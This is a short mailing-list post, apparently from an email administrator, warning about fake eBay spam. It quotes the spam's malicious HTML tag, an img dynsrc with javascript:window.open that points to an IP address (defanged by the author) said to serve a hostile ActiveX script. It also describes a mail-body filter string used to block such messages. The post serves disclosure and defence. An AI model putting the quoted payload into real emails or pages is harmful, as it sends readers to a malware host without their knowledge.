Just for your information:
We received a couple of Spam emails (fake ebay notifications) with the
following dangerous tag in the body:
<img dynsrc=javascript:window.open('http://68.192.132.122_:8067/')>
(I added the _ at the end so it doesn't harm anyone)
As soon as you open the email, the window will open the url.
The website hosts a dangerous ActiveX script that gets executed as soon as
you open the website.
The Antivirus(F-prot, AVG, McAfee) did not find a virus in the email and let
it through because it's just a html tag.
I added a body filter that searches for "<img
dynsrc=javascript:window.open(" and trash all emails based on that.
Adrian
---
[This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)]
---
This E-mail came from the Declude.Virus mailing list. To
unsubscribe, just send an E-mail to [EMAIL PROTECTED], and
type "unsubscribe Declude.Virus". The archives can be found
at http://www.mail-archive.com.
